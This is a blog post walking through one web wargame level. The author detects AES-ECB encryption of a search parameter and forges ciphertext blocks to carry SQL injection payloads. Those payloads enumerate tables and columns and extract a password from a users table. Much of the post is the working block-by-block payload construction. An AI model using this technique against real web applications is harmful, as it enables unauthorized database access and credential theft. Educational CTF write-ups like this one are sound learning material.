$> WARGAMES
Even though my daily work usually has little to do with security, I consider it a virtue to keep up to date with security basics and to try to maintain a certain breadth in my technical knowledge.
But perhaps more importantly, I find it to be a lot of fun to engage in what’s known as “wargames” – simulated hacking challenges which test one’s skills and reasoning.
If you’re a programmer with a knack for security you might have heard of the term “CTF” or “Capture The Flag” – events where individuals or teams compete to be the first to solve a set of challenges. Wargames are essentially the same, but without the time limit typically associated with CTFs and many of them are focused on learning basic techniques rather than having to figure out novel approaches to convoluted problems.
$> THE FLAVOUR OF THE DAY: WEB
As one might expect, there are many kinds of wargames. Common broad themes include web applications, cryptography and binary exploitation (abusing buffer overflows and alike). Harder wargames can require knowledge of many different topics and obscure language and/or configuration features.
I’m terrible with the web software stack and have therefore been afraid of trying web-themed wargames for a long time. I finally decided to change that by learning a bit and seeing how far I get. This post describes my way through one particularly interesting challenge I recently encountered after succeeding with some easier ones.
WARNING: Contains spoilers for a single level in a specific web wargame. It’s not the only writeup of this level, but you might still want to avoid reading if that sounds like something you’ll want to be doing by yourself.
$> GOAL
The goal of this challenge is simple: get the password to the next level. We know that the password can be found in the file /etc/passwords/password29 on the server if we can access it somehow, or it might be stored in some additional place we can get our hands on.
Let’s get right on it!
$> POKING AROUND
We land on a webpage that seems to host some sort of joke database. There appears to be a search feature which accepts input from us, and a notice proclaiming that this time we won’t be seeing the source code for the application we’re exploiting. Awww.
Let’s see what happens when we input some things manually…
The normal use seems simple enough: there exists a database of jokes, and we can search for text contained in them. Up to three are randomly picked if our query matches several entries.
After some trial and error, it seems like the application gracefully handles the good old SQL injection workhorses – quotes, dashes, pound signs and what have you.
But the URL looks interesting. And if something stands out in a wargame, it probably is.
If we manually mess with this URL, we get an interesting error.
A cursory DDG search reveals that this problem is usually related to AES encryption. That’s a good pointer.
$> SITEMAP
Based on what happens with our input and what we can see from the source code of the webpages, this is the sitemap we get:
http://site.name/ (same as index.php)
http://site.name/index.php
http://site.name/search.php
The input box on index.php results in a HTTP POST request to search.php which eventually gets redirected to a HTTP GET with a transformed query parameter.
Otherwise there’s little of interest that we can glean from the source code of the pages.
(Also, calling search.php without parameters yields a cryptic result: just the string “mep”. This led me on a wild goose chase for a *.pem file (crypto certificate) that I half expected to be able to find. I can’t know for sure there isn’t one, but my time was certainly wasted. This can be interpreted as the site admins being cruel, or me being stupid – the latter of which is a terrible thought to entertain.)
$> STUDYING THE RESULTING URLS
Inputting the string ‘aaaaaaaaaaaa’ as query yields the following URL:
http://site.name/search.php?query=G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D
Let’s pick out the query part:
G%2BglEae6W%2F1XjA7vRm21nNyEco%2Fc%2BJ2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA%2B2078pAPR3X9UET9Bj0m9rt%2Fc0tByJk%3D
And urldecode it:
G+glEae6W/1XjA7vRm21nNyEco/c+J2TdR0Qp8dcjPLAhy3ui8kLEVaROwiiI6OezoKpVTtluBKA+2078pAPR3X9UET9Bj0m9rt/c0tByJk=
Alphanumeric, with the addition of plus signs and slashes and equal signs at the end? Looks like base64.
Just decoding it to stdout messes up my terminal, so we’re looking at binary data. Let’s get a hexdump instead:
00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: ce82 a955 3b65 b812 80fb 6d3b f290 0f47 ...U;e....m;...G
00000040: 75fd 5044 fd06 3d26 f6bb 7f73 4b41 c899 u.PD..=&...sKA..
Yikes, I can’t make heads or tails out of it!
Trying out more human-pseudo-random values with a quick and dirty bash/curl script gives the following bits of knowledge:
- The initial 32 bytes are always the same.
- The output is deterministic (the same input always results in the same output).
- Curiously, a string consisting of just a bunch of percent signs results in jokes being displayed despite not containing percent signs.
$> CIPHER MODE DISCOVERY
Eventually, I ended up trying a really long repetition of a single character as input.
The result was the following:
00000000: 1be8 2511 a7ba 5bfd 578c 0eef 466d b59c ..%...[.W...Fm..
00000010: dc84 728f dcf8 9d93 751d 10a7 c75c 8cf2 ..r.....u....\..
00000020: c087 2dee 8bc9 0b11 5691 3b08 a223 a39e ..-.....V.;..#..
00000030: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000040: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000050: b390 38c2 8df7 9b65 d261 51df 58f7 eaa3 ..8....e.aQ.X...
00000060: b4ed a087 d3c0 bea2 bedc 1b61 40b9 e2eb ...........a@...
00000070: ca8c f4e6 1091 3aba e39a 0676 1920 4a5a ......:....v. JZ
This is really good information – it reveals that blocks are independently encrypted (Electronic CodeBook mode rather than Cipher Block Chaining), and are 16 bytes (128 bits) long.
$> CRACKING THE KEY
Yet another search engine query, this time on the subject of cracking 128 bit ECB AES, reveals that without more information about the key it would take approximately “Forever” to do that. It’s unlikely that we have that much time at our disposal so let’s look elsewhere.
$> CIPHERTEXT LAYOUT
We can now, however, figure out the layout of the ciphertext. (This is also where I moved from my shoddy shell script to the modern world with python3 and requests to better be able to automate it.)
I inserted ‘a’ characters one at a time until obtaining the first instance of the now familiar ciphertext of a block of 16 ‘a’ characters. This happened after 26 characters. We know from earlier that that two first 16 byte blocks are always the same, so there are six unknown bytes in the third.
Moving on from there, I inserted more ‘a’ characters until the ciphertext length increased by one block. This happened after three more characters. As per the specification of PKCS#7, if the length of the source mod the block size is zero, a full block of padding needs to be added. That means that three bytes in the last block earlier were just padding.
(Also that netted us the ciphertext of a valid padding-only block that we can use later.)
Putting all of this together, the result is as follows:
Legend:
P = unknown prefix
a = our query string
S = unknown suffix
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS
While we can’t really know what the unknown parts are, it’d be reasonable to guess that in one way or another they’re related to querying a database, be it SQL or some clever php grepping in a directory with plain text files.
$> DECIPHERING THE TAIL (FAIL)
With this recent knowledge in hand, it seems straightforward enough to figure out the suffix:
By reducing the length of our input by one, we should get the ciphertext for the following:
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaS -- b'abc123...'
SSSSSSSSSSSSSSSS
SSSSSSSSSSSS
Then, if we extend our input by one byte, iteratively trying out values for all possible bytes until we get the same ciphertext, we should be able to decipher the data one byte at a time.
Unfortunately, for mysterious reasons, this seemed to only work for a single byte (‘%’ – a percent sign) and then nothing would yield a matching ciphertext. I dabbled a while trying to figure out whether I had messed up something with my URL-encoding or so… but to no avail.
At this point I was at my wit’s (and weekend’s) end and let the problem rest for a few days.
$> A GIFT FROM THE GODS
While doing completely unrelated things at work, I stumbled across a SQL query like this:
"SELECT thing FROM things WHERE content LIKE 'prefix_%'"
And I remembered the recent percent sign oddity, and the one from the start of the challenge and suddenly everything fell into place. And by everything I mean both the realization of me clearly needing to study more SQL and what seems to be happening behind the scenes in the challenge.
(For reference: ‘%’ acts as a wildcard for ‘zero or more characters’ in SQL like. Underscores match a single character, and I could quickly verify that our query treated these characters exactly so.)
We can now have a proper qualified guess at what’s hidden in the ciphertext:
SELECT * FROM JO
KES WHERE JOKE L
IKE '%aaaaaaaaaa
aaaaaaaaaaaaaa%'
COLLATE latin1_
general_cs_as
(Database people might observe that parts of this guess are very likely way off, but it’s good enough to get us moving forward.)
Come weekend, I leaped back into the fray.
$> CRAFTING
We now have a way forward – conceptually as easy as your run of the mill SQL injection, we just have to mold our payload into a format that the application accepts.
So let’s make some blocks. We’ll craft something like this:
Legend:
P = unknown prefix
a = our padding and canaries
Q = the input we want ciphertext for
S = unknown suffix
PPPPPPPPPPPPPPPP
PPPPPPPPPPPPPPPP
PPPPPPaaaaaaaaaa
aaaaaaaaaaaaaaaa
QQQQQQQQQQQQQQQQ
aaaaaaaaaaaaaaaa
SSSSSSSSSSSSSSSS
SSSSSSSSSSSSS
So for example, if we want the ciphertext for “16 BYTES OF JUNK”, we send in a query string like:
“aaaaaaaaaaaaaaaaaaaaaaaaaa16 BYTES OF JUNKaaaaaaaaaaaaaaaa”
And we should get a result with ciphertext blocks like:
...
b'b39038c28df79b65d26151df58f7eaa3' (canary)
b'deadbeefdeadbeefdeadbeefdeadbeef' (what we want)
b'b39038c28df79b65d26151df58f7eaa3' (canary)
...
And we can keep saving values for interesting 16 byte blocks to be used in our payload.
It turns out, however, that some inputs corrupt the canary value after our expected 16 byte ciphertext block – most noticeably quotes and backslashes. As is customary, it’s time to guess why. I’d fathom a likely candidate is that before our query is encrypted, mysqli_real_escape_string is called on the input.
That means we can’t easily place quotes in the middle of a block. But we can feed this to the application:
aaaaaaaaaaaaaaa'
DataDataDataDat
To produce a ciphertext equivalent of:
aaaaaaaaaaaaaaa\
'DataDataDataDat
Like so:
That’ll be enough for our purposes.
$> THE ATTACK
We now know how to craft our own ciphertexts and have a good idea of what the backend is doing.
We also observe that we can ignore the suffix of the query and replace it with the full padding block ciphertext we acquired earlier to shorten our query a bit and not have the suffix interfere with our experiments.
At this point I attempted many times to craft something useful and failed for various more or less stupid reasons. But since I’m writing this from a retrospective angle, I can pretend that I immediately arrived at this point:
SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7'
1;# -- b'9fb2c82683985bd21224f4a1dd70507e'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
If we concatenate those values, base64-encode the block, URL-encode the result, and send it to search.php, we get the following:
Looks very promising!
Let’s proceed:
SELECT * FROM JO -- b'1be8251117ba5bfd578c0eef466db59c'
KES WHERE JOKE L -- b'dc84728fd2f89d93751d10a7c75c8cf2'
IKE '%aaaaaaaaaa -- b'c0872dee8b390b1156913b08a223a39e'
' UNION SELECT -- b'36c550994e94298f5a065ac38ea9cbd7'
table_name FROM -- b'49628aa9ea9f5f088b720ba991d91dc5'
information_sche -- b'0329a1abfe5c16ae68ce04abf9a935c8'
ma.tables;# -- b'3f74e043974e647b303b0c3e1cec6604'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
Bingo!
We get the entire list of table names. Two stand out: ‘jokes’ and ‘users’.
Let’s skip the jokes prefix too (and fixing the error I got when my query result no longer contained a joke column):
SELECT column_na -- b'0bb623e8185083eb808d997e9dc9edc4'
me as joke from -- b'8e934d7e5200d5d5cda7344f3f9b7f3c'
informat -- b'eb8b19c46430e317918ce1727a6350e1'
ion_schema.colum -- b'ab1cb043f4546efcc1d8f97b217bcf2d'
ns where table_n -- b'44bd82dfac975e1d5f5c1aa784985be2'
ame LIKE -- b'7427adc2fafca6f328e5845b4c75d912'
'users%%%%%%%%%% -- b'cc221115d011307f2515496e360fa96b'
';# -- b'0018ad0c0200bda82423885bea3701fa'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
We get:
username
password
Finally:
select username -- b'2e935761dedf092525f2259d8444df3e'
as joke from use -- b'13b7a41e291aafeff2ebb88c17fd1c5a'
rs union select -- b'ebd89e1563dc499ce3140dc21567240d'
password from us -- b'8c11f169f048c2b9ef2739011035e2b0'
ers;# -- b'4cf81cbe37c5a5fac50c72e64c37fd8b'
<16 byte pad> -- b'75fd5044fd063626f6bb7f734b41c899'
And we have completed the objective of the challenge: the username is “root@kali” and the secret password is “that is not how you specify the port”.
$> CONCLUSIONS
If you’ve read this far you’ve probably concluded that the challenge was not very realistic and the vulnerability could’ve been mitigated or prevented in multiple ways:
- Using different databases for login data and other, non-critical data
- Crafting the final SQL query closer to the database, making it difficult to bypass mysqli_real_escape_string
- Avoiding printing detailed error messages to the end user
- Using a modern mode of encryption (CBC) instead of deprecated ECB
- Not giving the end user direct access to the ciphertext
(Arguably there is little need for the extra encryption and data forwarding layer here at all, but let us assume that it is an unavoidable Business Requirement from upper management).
But all of that is beside the point! We explored, tried things, learned things and persisted until we found something that worked. Realistic scenario or not, that’s the workflow which yields results. And we had a lot of fun along the way, didn’t we?
If you think you might be interested in trying out some wargaming, here’s a good collection of sites that might be interesting:
https://www.wechall.net/active_sites
Everyone has their own preferences, so pick your poison and dive right in. If you don’t like a certain site, try another. If you’re very new, expect to be struggling a lot at the start – but there’s no need to rush, and indeed, you shouldn’t.
That’s all from me – hope you enjoyed the read and/or learned something!
Hugs,
Chrys